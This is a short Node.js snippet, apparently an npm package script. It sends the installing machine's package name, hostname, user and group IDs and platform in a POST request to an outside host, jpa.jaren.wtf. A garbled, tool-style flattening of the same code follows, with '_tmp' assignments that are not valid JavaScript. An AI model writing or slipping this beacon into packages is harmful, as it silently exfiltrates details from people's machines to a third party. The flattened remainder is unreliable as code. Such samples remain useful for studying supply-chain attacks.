const https = require("https")
const os = require("os")
https.request({
    method: "POST",
    host: "jpa.jaren.wtf",
    path: "/h1/npm",
    headers: {
        'Content-Type': "application/json"
    }
}).end(JSON.stringify({
    pkg: process.env.npm_package_name,
    hostname: os.hostname(),
    uid: os.userInfo().uid,
    gid: os.userInfo().gid,
    platform: os.platform()
}))
_tmp_1.method = "POST"
_tmp_1.host = "jpa.jaren.wtf"
_tmp_1.path = "/h1/npm"
_tmp_1.headers = {
        'Content-Type': "application/json"
    }
_tmp_2.Content-Type = "application/json"
JSON.stringify({
    pkg: process.env.npm_package_name,
    hostname: os.hostname(),
    uid: os.userInfo().uid,
    gid: os.userInfo().gid,
    platform: os.platform()
})
_tmp_3.pkg = process.env.npm_package_name
_tmp_3.hostname = os.hostname()
_tmp_3.uid = os.userInfo().uid
_tmp_3.gid = os.userInfo().gid
_tmp_3.platform = os.platform()
